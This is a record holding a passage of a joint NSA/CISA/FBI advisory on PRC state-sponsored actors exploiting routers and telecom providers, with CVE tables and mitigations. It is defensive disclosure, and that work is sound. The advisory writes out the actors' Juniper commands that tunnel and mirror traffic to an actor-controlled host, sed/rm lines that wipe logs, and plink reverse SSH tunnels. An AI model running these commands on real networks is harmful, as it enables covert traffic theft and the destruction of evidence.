{
	"id": "0239c271-3333-40a0-91f9-59e19a18d4d5",
	"created_at": "2026-04-06T00:20:09.608603Z",
	"updated_at": "2026-04-10T13:12:01.641331Z",
	"deleted_at": null,
	"sha1_hash": "a0f19efc809a407c598cf6c6396dc210d1a00f72",
	"title": "People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 160783,
	"plain_text": "People’s Republic of China State-Sponsored Cyber Actors Exploit\r\nNetwork Providers and Devices | CISA\r\nPublished: 2022-06-10 · Archived: 2026-04-05 21:44:11 UTC\r\nSummary\r\nBest Practices\r\n• Apply patches as soon as possible\r\n• Disable unnecessary ports and protocols\r\n• Replace end-of-life infrastructure\r\n• Implement a centralized patch management system\r\nThis joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber\r\nactors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised\r\ninfrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private\r\nsector organizations. The advisory details the targeting and compromise of major telecommunications companies and\r\nnetwork service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—\r\nassociated with network devices routinely exploited by the cyber actors since 2020.\r\nThis joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and\r\nInfrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA,\r\nand FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI),\r\nincluding the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics,\r\ntechniques, and procedures (TTPs).\r\nEntities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing\r\nend-of-life infrastructure, and implementing a centralized patch management program.\r\nNSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the\r\nrecommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and\r\nreduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.\r\nFor more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and\r\nAdvisories webpage.\r\nClick here for PDF.\r\nCommon vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors\r\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network\r\ndevices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as\r\nadditional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on\r\nother entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors\r\nwith the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often\r\noverlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing\r\nservices and endpoint devices.\r\nSince 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified\r\nsecurity vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors\r\nto gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services\r\n[T1133 ]  or public facing applications [T1190 ]—without using their own distinctive or identifying malware—so long\r\nas the actors acted before victim organizations updated their systems. \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 1 of 17\n\nPRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points\r\nfrom numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs).\r\nThe cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers.\r\nThey use these servers to register and access operational email accounts, host C2 domains, and interact with victim\r\nnetworks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.\r\nThese cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have\r\nobserved state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their\r\nongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately\r\nfollowing the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their\r\ncustomized toolset with publicly available tools, especially by leveraging tools that are native to the network environment,\r\nto obscure their activity by blending into the noise or normal activity of a network.\r\nNSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network\r\ndevice CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.\r\nTable 1: Top network device CVEs exploited by PRC state-sponsored cyber actors\r\nVendor                                       CVE                                  Vulnerability Type\r\nCisco\r\nCVE-2018-0171 Remote Code Execution\r\nCVE-2019-15271 RCE\r\nCVE-2019-1652 RCE\r\nCitrix CVE-2019-19781 RCE\r\nDrayTek CVE-2020-8515 RCE\r\nD-Link CVE-2019-16920 RCE\r\nFortinet CVE-2018-13382 Authentication Bypass\r\nMikroTik CVE-2018-14847 Authentication Bypass\r\nNetgear CVE-2017-6862 RCE\r\nPulse\r\nCVE-2019-11510 Authentication Bypass\r\nCVE-2021-22893 RCE\r\nQNAP\r\nCVE-2019-7192 Privilege Elevation\r\nCVE-2019-7193 Remote Inject\r\nCVE-2019-7194 XML Routing Detour Attack\r\nCVE-2019-7195 XML Routing Detour Attack\r\nZyxel CVE-2020-29583 Authentication Bypass\r\nTelecommunications and network service provider targeting\r\nPRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The\r\nactors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [T1595.002 ], to\r\nidentify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is\r\nan open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows\r\nfor the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured\r\nby major industry providers, including Cisco, Fortinet, and MikroTik.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 2 of 17\n\nUpon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored\r\ncyber actors have identified critical users and infrastructure including systems critical to maintaining the security of\r\nauthentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service\r\n(RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database\r\n[T1078 ] and utilized SQL commands to dump the credentials [T1555 ], which contained both cleartext and hashed\r\npasswords for user and administrative accounts. \r\nHaving gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom\r\nautomated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119\r\n]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current\r\nconfiguration of each router. After successfully capturing the command output, these configurations were exfiltrated off\r\nnetwork to the actor’s infrastructure [TA0010 ]. The cyber actors likely used additional scripting to further automate the\r\nexploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of\r\nrouter configurations that would be necessary to successfully manipulate traffic within the network.\r\nArmed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber\r\nactors returned to the network and used their access and knowledge to successfully authenticate and execute router\r\ncommands to surreptitiously route [T1599 ], capture [T1020.001 ], and exfiltrate traffic out of the network to actor-controlled infrastructure. \r\nWhile other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper\r\nrouter to perform initial tunnel configuration for eventual exfiltration out of the network:\r\nset chassis fpc \u003cslot number\u003e pic \u003cuser defined value\u003e tunnel-services bandwidth \u003cuser defined value\u003e\r\nset chassis network-services all-ethernet\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e tunnel source \u003clocal network IP address\u003e\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e tunnel destination \u003cactor controlled IP address\u003e\r\n \r\nAfter establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to\r\nroute traffic to actor-controlled infrastructure.\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e family inet address \u003clocal network IP address subnet\u003e\r\nset routing-options static route \u003clocal network IP address\u003e next-hop \u003cactor controlled IP address\u003e\r\n \r\nPRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was\r\nsubsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. \r\nset firewall family inet filter \u003cfilter name\u003e term \u003cfilter variable\u003e then port-mirror\r\nset forwarding-options port-mirroring input rate 1\r\nset forwarding-options port-mirroring family inet output interface \u003cinterface-id\u003e next-hop \u003clocal network IP address\u003e\r\nset forwarding-options port-mirroring family inet output no-filter-check\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e family inet filter input \u003cfilter name\u003e\r\nset interfaces \u003cinterface-id\u003e unit \u003cunit number\u003e family inet filter output \u003cfilter name\u003e\r\n \r\nHaving completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy\r\nevidence of their activity to further obfuscate their presence and evade detection.\r\nsed -i -e '/\u003cREGEX\u003e/d' \u003clog filepath 1\u003e\r\nsed -i -e '/\u003cREGEX\u003e/d' \u003clog filepath 2\u003e\r\nsed -i -e '/\u003cREGEX\u003e/d' \u003clog filepath 3\u003e\r\nrm -f \u003clog filepath 4\u003e\r\nrm -f \u003clog filepath 5\u003e\r\nrm -f \u003clog filepath 6\u003e\r\n \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 3 of 17\n\nPRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH\r\ntunnels [T1572 ] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often\r\nconducted system network configuration discovery [T1016.001 ] on these host networks by sending hypertext transfer\r\nprotocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.\r\nplink.exe –N –R \u003clocal port\u003e:\u003chost 1\u003e:\u003cremote port\u003e -pw \u003cuser defined password\u003e -batch root@\u003cVPS1\u003e -P \u003cremote SSH\r\nport\u003e\r\nplink.exe –N –R \u003clocal port\u003e:\u003chost 2\u003e:\u003cremote port\u003e -pw \u003cuser defined password\u003e -batch root@\u003cVPS2\u003e -P \u003cremote SSH\r\nport\u003e\r\n \r\nMitigations\r\nNSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection\r\nrecommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have\r\nspecific additional mitigations below, the following mitigations generally apply:\r\nKeep systems and products updated and patched as soon as possible after patches are released [D3-SU ] . Consider\r\nleveraging a centralized patch management system to automate and expedite the process.\r\nImmediately remove or isolate suspected compromised devices from the network [D3-ITF ] [D3-OTF ].\r\nSegment networks to limit or block lateral movement [D3-NI ].\r\nDisable unused or unnecessary network services, ports, protocols, and devices [D3-ACH ] [D3-ITF ] [D3-OTF\r\n].\r\nEnforce multifactor authentication (MFA) for all users, without exception [D3-MFA ].\r\nEnforce MFA on all VPN connections [D3-MFA ]. If MFA is unavailable, enforce password complexity\r\nrequirements [D3-SPP ].\r\nImplement strict password requirements, enforcing password complexity, changing passwords at a defined frequency,\r\nand performing regular account reviews to ensure compliance [D3-SPP ].\r\nPerform regular data backup procedures and maintain up-to-date incident response and recovery procedures.\r\nDisable external management capabilities and set up an out-of-band management network [D3-NI ].\r\nIsolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce the exposure of the internal\r\nnetwork [D3-NI ].\r\nEnable robust logging of Internet-facing services and monitor the logs for signs of compromise [D3-NTA ] [D3-PM\r\n].\r\nEnsure that you have dedicated management systems [D3-PH ] and accounts for system administrators. Protect\r\nthese accounts with strict network policies [D3-UAP ].\r\nEnable robust logging and review of network infrastructure accesses, configuration changes, and critical\r\ninfrastructure services performing authentication, authorization, and accounting functions [D3-PM ].\r\nUpon responding to a confirmed incident within any portion of a network, response teams should scrutinize network\r\ninfrastructure accesses, evaluate potential lateral movement to network infrastructure and implement corrective\r\nactions commensurate with their findings.\r\nResources\r\nRefer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance\r\nfor previous reporting on People’s Republic of China state-sponsored malicious cyber activity.\r\nU.S. government and critical infrastructure organizations, should consider signing up for CISA’s cyber hygiene services,\r\nincluding vulnerability scanning, to help reduce exposure to threats.\r\nU.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration\r\nCenter’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability\r\nscanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these\r\nservices, email dib_defense@cyber.nsa.gov.\r\nAdditional References\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 4 of 17\n\nCISA (2022), Weak Security Controls and Practices Routinely Exploited for Initial Access.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-137a\r\nCISA (2022) 2021 Top Routinely Exploited Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa22-117a\r\nNSA (2021), Selecting and Hardening Remote Access VPN Solutions.\r\nhttps://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/CSI_SELECTING-HARDENING-REMOTE-ACCESS-VPNS-20210928.PDF\r\nNSA (2021), Chinese State-Sponsored Cyber Operations: Observed TTPs.\r\nhttps://media.defense.gov/2021/Jul/19/2002805003/-1/-1/0/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF\r\nCISA (2021), Exploitation of Pulse Connect Secure Vulnerabilities. https://www.cisa.gov/uscert/ncas/alerts/aa21-\r\n110a\r\nNSA (2020), Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities.\r\nhttps://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF\r\nCISA (2020), Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa20-258a\r\nNSA (2020), Performing Out-of-Band Network Management.\r\nhttps://media.defense.gov/2020/Sep/17/2002499616/-1/-1/0/PERFORMING_OUT_OF_BAND_NETWORK_MANAGEMENT202\r\nCISA (2020), Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa20-020a\r\nNSA (2019), Mitigating Recent VPN Vulnerabilities.\r\nhttps://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/Mitigating%20Recent%20VPN%20Vulnerabilities%20-\r\n%20Copy.pdf\r\nNSA (2019), Update and Upgrade Software Immediately.\r\nhttps://media.defense.gov/2019/Sep/09/2002180319/-1/-1/0/Update%20and%20Upgrade%20Software%20Immediately.docx%20-\r\n%20Copy.pdf \r\nContact Information \r\nTo report incidents and anomalous activity or to request incident response resources or technical assistance related to these\r\nthreats, contact CISA at report@cisa.gov . To report computer intrusion or cybercrime activity related to information found\r\nin this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-\r\n292-3937 or by email at CyWatch@fbi.gov . For NSA client requirements or general cybersecurity inquiries, contact\r\nCybersecurity_Requests@nsa.gov . \r\nMedia Inquiries / Press Desk: \r\nNSA Media Relations, 443-634-0721, MediaRelations@nsa.gov  \r\nCISA Media Relations, 703-235-2010, CISAMedia@cisa.dhs.gov\r\nFBI National Press Office, 202-324-3691, npo@fbi.gov  \r\nDisclaimer of endorsement\r\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees.\r\nReference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or\r\notherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and\r\nthis guidance shall not be used for advertising or product endorsement purposes.\r\nPurpose\r\nThis advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions,\r\nincluding their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be\r\nshared broadly to reach all appropriate stakeholders. \r\nAppendix A: Vulnerabilities\r\nTable 2: Information on Cisco CVE-2018-0171\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 5 of 17\n\nCisco CVE-2018-0171                           CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nA vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an\r\nunauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS)\r\ncondition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet\r\ndata. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on\r\nTCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which\r\ncould have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on\r\nthe device, causing an indefinite loop on the affected device that triggers a watchdog crash.\r\nRecommended Mitigations \r\nCisco has released software updates that address this vulnerability.\r\nIn addition, the Cisco Smart Install feature is highly recommended to be disabled to reduce exposure.\r\nDetection Methods\r\nCISCO IOS Software Checker\r\nVulnerable Technologies and Versions\r\nThe vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have\r\nthe smart install client feature enabled. Only smart install client switches are affected by this vulnerability described in\r\nthis advisory. \r\nReferences\r\nhttp://www.securityfocus.com/bid/103538\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2\r\nhttps://ics-cert.us-cert.gov/advisories/ICSA-18-107-04\r\nhttps://ics-cert.us-cert.gov/advisories/ICSA-18-107-05\r\nhttps://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490\r\nhttp://www.securitytracker.com/id/1040580\r\nTable 3: Information on Cisco CVE-2019-15271\r\n                                              Cisco CVE-2019-15271                      CVSS 3.0: 8.8 (High)\r\nVulnerability Description \r\nA vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow\r\nan authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a\r\nvalid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An\r\nattacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of\r\nthe targeted device. A successful exploit could allow the attacker to execute commands with root privileges.\r\nRecommended Mitigations \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 6 of 17\n\nCisco CVE-2019-15271                      CVSS 3.0: 8.8 (High)\r\nCisco has released free software updates that address the vulnerability described in this advisory.\r\nCisco fixed this vulnerability in firmware releases 4.2.3.10 and later for the Cisco RV042 Dual WAN VPN\r\nRouter and RV042G Dual Gigabit WAN VPN Router.\r\nAdministrators can reduce the attack surface by disabling the Remote Management feature if there is no\r\noperational requirement to use it. Note that the feature is disabled by default.\r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release\r\nearlier than 4.2.3.10:\r\nRV016 Multi-WAN VPN Router\r\nRV042 Dual WAN VPN Router\r\nRV042G Dual Gigabit WAN VPN Router\r\nRV082 Dual WAN VPN Router\r\nReferences \r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x\r\nTable 4: Information on Cisco CVE-2019-1652\r\n                                                Cisco CVE-2019-1652                    CVSS 3.0: 7.2 (High)\r\nVulnerability Description \r\nA vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN\r\nVPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to\r\nexecute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could\r\nexploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an\r\naffected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux\r\nshell as root. Cisco has released firmware updates that address this vulnerability.\r\nRecommended Mitigations \r\nCisco has released free software updates that address the vulnerability described in this advisory\r\nThis vulnerability is fixed in RV320 and RV325 Dual Gigabit WAN VPN Routers Firmware Release 1.4.2.22 and\r\nlater.\r\nIf the Remote Management feature is enabled, Cisco recommends disabling it to reduce exposure.\r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 7 of 17\n\nCisco CVE-2019-1652                    CVSS 3.0: 7.2 (High)\r\nThis vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware\r\nreleases 1.4.2.15 through 1.4.2.20.\r\nReferences \r\nhttp://www.securityfocus.com/bid/106728\r\nhttps://seclists.org/bugtraq/2019/Mar/55\r\nhttps://www.exploit-db.com/exploits/46243/\r\nhttps://www.exploit-db.com/exploits/46655/\r\nhttp://seclists.org/fulldisclosure/2019/Mar/61\r\nhttp://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html\r\nhttp://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html\r\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject\r\nTable 5: Information on Citrix CVE-2019-19781\r\n                                                   Citrix CVE-2019-19781          CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nAn issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0.\r\nThey allow Directory Traversal.\r\nRecommended Mitigations \r\nImplement the appropriate refresh according to the vulnerability details outlined by vendor: Citrix: Mitigation\r\nSteps for CVE-2019-19781.\r\nIf possible, only allow the VPN to communicate with known Internet Protocol (IP) addresses (allow-list).\r\nDetection Methods \r\nCISA has developed a free detection tool for this vulnerability: cisa.gov/check-cve-2019-19781: Test a host for\r\nsusceptibility to CVE-2019-19781.\r\nNmap developed a script that can be used with the port scanning engine: CVE-2019-19781 – Critix ADC Path\r\nTraversal #1893.\r\nCitrix also developed a free tool for detecting compromises of Citrix ADC Appliances related to CVE-2019-\r\n19781: Citrix / CVE-2019-19781: IOC Scanner for CVE-2019-19781.\r\nCVE-2019-19781 is commonly exploited to install web shell malware. The National Security Agency (NSA)\r\nprovides guidance on detecting and preventing web shell malware at\r\nhttps://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF and signatures at https://github.com/nsacyber/Mitigating-Web-Shells.\r\nVulnerable Technologies and Versions \r\nThe vulnerability affects the following Citrix product versions on all supported platforms:\r\nCitrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24\r\nNetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18\r\nNetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13\r\nNetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 8 of 17\n\nCitrix CVE-2019-19781          CVSS 3.0: 9.8 (Critical)\r\nNetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12\r\nCitrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported\r\nsoftware release builds before 10.2.6b and 11.0.3b \r\nReferences \r\nhttps://support.citrix.com/article/CTX267027\r\nTable 6: Information on DrayTek CVE-2020-8515\r\n                                                 DrayTek CVE-2020-8515          CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nDrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta\r\ndevices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.\r\nRecommended Mitigations \r\nUsers of affected models should upgrade to 1.5.1 firmware or later as soon as possible, the updated firmware\r\naddresses this issue.\r\nDisable the remote access on your router if you don’t need it.\r\nDisable remote access (admin) and SSL VPN. The ACL does not apply to SSL VPN connections (Port 443) so\r\nyou should also temporarily disable SSL VPN until you have updated the firmware.\r\nAlways back up your config before doing an upgrade.\r\nAfter upgrading, check that the web interface now shows the new firmware version.\r\nEnable syslog logging for monitoring if there are abnormal events. \r\nDetection Methods \r\nCheck that no additional remote access profiles (VPN dial-in, teleworker or LAN to LAN) or admin users (for\r\nrouter admin) have been added.\r\nCheck if any ACL (Access Control Lists) have been altered.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the Vigor3900/2960/300B before firmware version 1.5.1.\r\nReferences \r\nhttps://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/\r\nhttp://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html\r\nhttps://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html\r\nTable 7: Information on D-Link CVE-2019-16920\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 9 of 17\n\nD-Link CVE-2019-16920          CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nUnauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a \"PingTest\" device common gateway interface that\r\ncould lead to common injection. An attacker who successfully triggers the command injection could achieve full system\r\ncompromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615,\r\nDIR-835, and DIR-825.\r\nRecommended Mitigations \r\nRecommendation is to replace affected devices with ones that are currently supported by the vendor. End-of-life\r\ndevices should not be used.\r\nDetection Methods \r\nHTTP packet inspection to look for arbitrary input to the “ping_test” command \r\nVulnerable Technologies and Versions \r\nDIR DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and\r\nDIR-82\r\nReferences \r\nhttps://www.kb.cert.org/vuls/id/766427\r\nhttps://fortiguard.com/zeroday/FG-VD-19-117\r\nhttps://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3\r\nhttps://www.seebug.org/vuldb/ssvid-98079\r\nTable 8: Information on Fortinet CVE-2018-13382\r\n                                                     Fortinet CVE-2018-13382            CVSS 3.0: 7.5 (High)\r\nVulnerability Description \r\nAn Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and\r\nFortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated\r\nattacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.\r\nRecommended Mitigations \r\nUpgrade to FortiOS versions 5.4.11, 5.6.9, 6.0.5, 6.2.0 or above and/or upgrade to FortiProxy version 1.2.9 or\r\nabove or version 2.0.1 or above.\r\nSSL VPN users with local authentication can mitigate the impact by enabling Two-Factor Authentication (2FA).\r\nMigrate SSL VPN user authentication from local to remote (LDAP or RADIUS).\r\nTotally disable the SSL-VPN service (both web-mode and tunnel-mode) by applying the following CLI\r\ncommands: config vpn ssl settings, unset source-interface, end.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 10 of 17\n\nFortinet CVE-2018-13382            CVSS 3.0: 7.5 (High)\r\nDetection Methods \r\nHTTP packet inspection to look for specially crafted packets containing the magic key for the SSL VPN\r\npassword modification\r\nVulnerable Technologies and Versions\r\nThis vulnerability affects the following products: \r\nFortinet FortiOS 6.0.0 to 6.0.4\r\nFortinet FortiOS 5.6.0 to 5.6.8\r\nFortinet FortiOS 5.4.1 to 5.4.10\r\nFortinet FortiProxy 2.0.0\r\nFortinet FortiProxy 1.2.8 and below\r\nFortinet FortiProxy 1.1.6 and below\r\nFortinet FortiProxy 1.0.7 and below\r\nFortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with\r\nlocal authentication.\r\nReferences \r\nhttps://fortiguard.com/psirt/FG-IR-18-389\r\nhttps://fortiguard.com/advisory/FG-IR-18-389\r\nhttps://www.fortiguard.com/psirt/FG-IR-20-231\r\nTable 9: Information on Mikrotik CVE-2018-14847\r\n                                            Mikrotik CVE-2018-14847            CVSS 3.0: 9.1 (Critical)\r\nVulnerability Description \r\nMikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote\r\nauthenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.\r\nRecommended Mitigations \r\nUpgrade WinBox and RouterOS and change passwords\r\nFirewall the WinBox port from the public interface and from untrusted networks\r\nDetection Methods \r\nUse export command to see all your configuration and inspect for any abnormalities, such as unknown SOCKS\r\nproxy settings and scripts.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affected the following MikroTik products:\r\nAll bugfix releases from 6.30.1 to 6.40.7\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 11 of 17\n\nMikrotik CVE-2018-14847            CVSS 3.0: 9.1 (Critical)\r\nAll current releases from 6.29 to 6.42\r\nAll RC releases from 6.29rc1 to 6.43rc3\r\nReferences\r\nhttps://blog.mikrotik.com/security/winbox-vulnerability.html\r\nTable 10: Information on Netgear CVE-2017-6862\r\n                                             Netgear CVE-2017-6862                  CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nNETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices\r\nbefore 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the\r\nadministration webapp. The NETGEAR ID is PSV-2016-0261.\r\nRecommended Mitigations \r\nNETGEAR has released firmware updates that fix the unauthenticated remote code execution vulnerability for all\r\naffected products. \r\nDetection Methods \r\nHTTP packet inspection to find any specially crafted packets attempting a buffer 